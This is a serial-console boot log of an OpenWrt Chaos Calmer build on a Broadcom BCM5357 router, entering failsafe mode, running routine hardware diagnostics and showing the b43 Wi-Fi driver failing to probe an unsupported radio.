[    1.020000] 8021q: 802.1Q VLAN Support v1.8
[    1.030000] VFS: Mounted root (squashfs filesystem) readonly on device 31:4.
[    1.040000] Freeing unused kernel memory: 144K (802ec000 - 80310000)
procd: Console is alive
procd: - watchdog -
[    5.170000] usbcore: registered new interface driver usbfs
[    5.180000] usbcore: registered new interface driver hub
[    5.180000] usbcore: registered new device driver usb
[    5.200000] SCSI subsystem initialized
[    5.220000] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver
[    5.230000] ehci-platform: EHCI generic platform driver
[    5.230000] ehci-platform ehci-platform.0: EHCI Host Controller
[    5.240000] ehci-platform ehci-platform.0: new USB bus registered, assigned bus number 1
[    5.250000] ehci-platform ehci-platform.0: irq 5, io mem 0x18004000
[    5.270000] ehci-platform ehci-platform.0: USB 2.0 started, EHCI 1.00
[    5.270000] hub 1-0:1.0: USB hub found
[    5.280000] hub 1-0:1.0: 2 ports detected
procd: - preinit -
[    5.870000] usb 1-1: new high-speed USB device number 2 using ehci-platform
[    5.920000] random: mktemp urandom read with 59 bits of entropy available
Press the [f] key and hit [enter] to enter failsafe mode
Press the [1], [2], [3] or [4] key and hit [enter] to select the debug level
[    6.020000] hub 1-1:1.0: USB hub found
[    6.020000] hub 1-1:1.0: 4 ports detected
[    6.310000] usb 1-1.1: new high-speed USB device number 3 using ehci-platform
f
- failsafe -


BusyBox v1.22.1 (2014-08-10 22:19:11 EEST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

ash: can't access tty; job control turned off
  _______                     ________        __
 |       |.-----.-----.-----.|  |  |  |.----.|  |_
 |   -   ||  _  |  -__|     ||  |  |  ||   _||   _|
 |_______||   __|_____|__|__||________||__|  |____|
          |__| W I R E L E S S   F R E E D O M
 -----------------------------------------------------
 CHAOS CALMER (Bleeding Edge, r42110)
 -----------------------------------------------------
  * 1 1/2 oz Gin            Shake with a glassful
  * 1/4 oz Triple Sec       of broken ice and pour
  * 3/4 oz Lime Juice       unstrained into a goblet.
  * 1 1/2 oz Orange Juice
  * 1 tsp. Grenadine Syrup
 -----------------------------------------------------
root@(none):/# 
root@(none):/# uname -a
Linux (none) 3.14.16 #3 Tue Aug 12 01:25:33 EEST 2014 mips GNU/Linux
root@(none):/# cat /proc/cpuinfo
system type             : Broadcom BCM5357
machine                 : Unknown Board

processor               : 0
cpu model               : MIPS 74Kc V4.9
BogoMIPS                : 249.44
wait instruction        : yes
microsecond timers      : yes
tlb_entries             : 64
extra interrupt vector  : yes
hardware watchpoint     : yes, count: 4, address/irw mask: [0x0ffc, 0x0ffc, 0x0ffb, 0x0ffb]
isa                     : mips1 mips2 mips32r1 mips32r2
ASEs implemented        : mips16 dsp dsp2
shadow register sets    : 1
kscratch registers      : 0
core                    : 0
VCED exceptions         : not available
VCEI exceptions         : not available

root@(none):/# cat /proc/mtd
dev:    size   erasesize  name
mtd0: 00040000 00010000 "boot"
mtd1: 0000001c 0000001c "firmware"
mtd2: 000009c4 000009c4 "loader"
mtd3: 0010be20 00010000 "linux"
mtd4: 008f3800 00010000 "rootfs"
mtd5: 005b0000 00010000 "rootfs_data"
mtd6: 005b0000 00010000 "firmware"
mtd7: 001613cc 00010000 "linux"
mtd8: 0044eb18 00010000 "rootfs"
mtd9: 00010000 00010000 "nvram"
root@(none):/# free
             total         used         free       shared      buffers
Mem:        126612        12928       113684            0         1900
-/+ buffers:              11028       115584
Swap:            0            0            0
root@(none):/# modprobe b43
[   26.940000] Loading modules backported from Linux version master-2014-05-22-0-gf2032ea
[   26.940000] Backport generated by backports.git backports-20140320-37-g5c33da0
[   26.970000] cfg80211: Calling CRDA to update world regulatory domain
[   26.990000] cfg80211: World regulatory domain updated:
[   26.990000] cfg80211:  DFS Master region: unset
[   26.990000] cfg80211:   (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp), (dfs_cac_time)
[   27.000000] cfg80211:   (2402000 KHz - 2472000 KHz @ 40000 KHz), (N/A, 2000 mBm), (N/A)
[   27.010000] cfg80211:   (2457000 KHz - 2482000 KHz @ 40000 KHz), (N/A, 2000 mBm), (N/A)
[   27.020000] cfg80211:   (2474000 KHz - 2494000 KHz @ 20000 KHz), (N/A, 2000 mBm), (N/A)
[   27.030000] cfg80211:   (5170000 KHz - 5250000 KHz @ 160000 KHz), (N/A, 2000 mBm), (N/A)
[   27.040000] cfg80211:   (5250000 KHz - 5330000 KHz @ 160000 KHz), (N/A, 2000 mBm), (0 s)
[   27.050000] cfg80211:   (5490000 KHz - 5730000 KHz @ 160000 KHz), (N/A, 2000 mBm), (0 s)
[   27.050000] cfg80211:   (5735000 KHz - 5835000 KHz @ 80000 KHz), (N/A, 2000 mBm), (N/A)
[   27.060000] cfg80211:   (57240000 KHz - 63720000 KHz @ 2160000 KHz), (N/A, 0 mBm), (N/A)
[   27.120000] b43-phy0: Broadcom 5357 WLAN found (core revision 28)
[   27.130000] b43-phy0: Found PHY: Analog 9, Type 4 (N), Revision 9
[   27.130000] b43-phy0 ERROR: FOUND UNSUPPORTED RADIO (Manuf 0x17F, ID 0x2057, Revision 5, Version 2)
[   27.140000] b43: probe of bcma0:0 failed with error -122
[   27.150000] Broadcom 43xx driver loaded [ Features: NL ]

root@(none):/#